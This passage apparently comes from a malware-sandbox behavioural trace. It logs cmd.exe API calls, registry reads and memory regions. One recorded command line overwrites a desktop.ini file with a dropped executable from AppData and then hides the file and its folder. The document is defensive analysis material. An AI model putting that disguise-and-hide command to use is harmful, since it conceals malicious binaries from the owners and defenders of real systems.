(_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] GetFileType (hFile=0x4c) returned 0x1 [0202.681] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.681] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.682] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.682] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.682] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.682] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.683] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.683] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x200, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f0b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f0b0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f100*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f100*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f150*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f150*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1a0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] WriteFile (in: hFile=0x4c, lpBuffer=0x30f1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f1f0*, lpNumberOfBytesWritten=0x30e244*=0x50, lpOverlapped=0x0) returned 1 [0202.683] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.683] GetFileType (hFile=0x4c) returned 0x1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] WriteFile (in: hFile=0x4c, lpBuffer=0x30f240*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f240*, lpNumberOfBytesWritten=0x30e244*=0x20, lpOverlapped=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.684] ReadFile (in: hFile=0x54, lpBuffer=0x30f060, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30e250, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesRead=0x30e250*=0x32, lpOverlapped=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] GetFileType (hFile=0x4c) returned 0x1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] GetFileType (hFile=0x4c) returned 0x1 [0202.684] _get_osfhandle (_FileHandle=1) returned 0x4c [0202.684] WriteFile (in: hFile=0x4c, lpBuffer=0x30f060*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x30e244, lpOverlapped=0x0 | out: lpBuffer=0x30f060*, lpNumberOfBytesWritten=0x30e244*=0x32, lpOverlapped=0x0) returned 1 [0202.684] _get_osfhandle (_FileHandle=4) returned 0x54 [0202.684] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30e230 | out: lpNewFilePointer=0x0) returned 1 [0202.684] _close (_FileHandle=4) returned 0 [0202.684] FindNextFileW (in: hFindFile=0x4a0e80, lpFindFileData=0x30f2c4 | out: lpFindFileData=0x30f2c4) returned 0 [0202.685] GetLastError () returned 0x12 [0202.685] FindClose (in: hFindFile=0x4a0e80 | out: hFindFile=0x4a0e80) returned 1 [0202.685] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0202.685] _close (_FileHandle=3) returned 0 [0202.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.686] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.686] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.686] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.686] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.686] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.686] SetConsoleInputExeNameW () returned 0x1 [0202.686] GetConsoleOutputCP () returned 0x1b5 [0202.686] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.686] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.686] exit (_Code=0) Process: id = "489" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x8a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{33D1F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29501 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29502 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 29503 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 29504 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 29505 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29506 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29507 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29508 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29509 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 29510 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29950 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29951 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29952 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29953 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29954 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 29955 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29956 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29957 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29958 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29959 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29960 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29961 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29962 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29963 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29964 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 29965 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29966 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29967 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 29968 start_va = 0x3a0000 end_va = 0x4a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29969 start_va = 0x4b0000 end_va = 0x4b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 29970 start_va = 0x4c0000 end_va = 0x4c0fff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 29971 start_va = 0x4d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 29972 start_va = 0x560000 end_va = 0x115ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 29973 start_va = 0x1160000 end_va = 0x12c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001160000" filename = "" Region: id = 29974 start_va = 0x12d0000 end_va = 0x159efff entry_point = 0x12d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 686 os_tid = 0xff8 [0202.526] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fcd4 | out: lpSystemTimeAsFileTime=0x12fcd4*(dwLowDateTime=0xad859ae0, dwHighDateTime=0x1d440a9)) [0202.526] GetCurrentProcessId () returned 0x8a4 [0202.527] GetCurrentThreadId () returned 0xff8 [0202.527] GetTickCount () returned 0x3926f [0202.527] QueryPerformanceCounter (in: lpPerformanceCount=0x12fccc | out: lpPerformanceCount=0x12fccc*=25931576643) returned 1 [0202.527] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.527] __set_app_type (_Type=0x1) [0202.527] __p__fmode () returned 0x76b331f4 [0202.527] __p__commode () returned 0x76b331fc [0202.527] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.527] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.527] GetCurrentThreadId () returned 0xff8 [0202.527] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xff8) returned 0x38 [0202.528] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.528] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.528] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.528] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.528] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fc64 | out: phkResult=0x12fc64*=0x0) returned 0x2 [0202.528] VirtualQuery (in: lpAddress=0x12fc9b, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.528] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fc34, dwLength=0x1c | out: lpBuffer=0x12fc34*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.528] GetConsoleOutputCP () returned 0x1b5 [0202.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.528] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.528] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.528] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.528] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.529] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.529] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.529] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.529] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.529] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.529] GetEnvironmentStringsW () returned 0x2b04b0* [0202.529] FreeEnvironmentStringsW (penv=0x2b04b0) returned 1 [0202.529] GetEnvironmentStringsW () returned 0x2b04b0* [0202.529] FreeEnvironmentStringsW (penv=0x2b04b0) returned 1 [0202.529] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ebd4 | out: phkResult=0x12ebd4*=0x40) returned 0x0 [0202.529] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x60, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x1, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x0, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x4) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegCloseKey (hKey=0x40) returned 0x0 [0202.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ebd4 | out: phkResult=0x12ebd4*=0x40) returned 0x0 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x0, lpData=0x12ebe0*=0x40, lpcbData=0x12ebd8*=0x1000) returned 0x2 [0202.530] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ebdc, lpData=0x12ebe0, lpcbData=0x12ebd8*=0x1000 | out: lpType=0x12ebdc*=0x4, 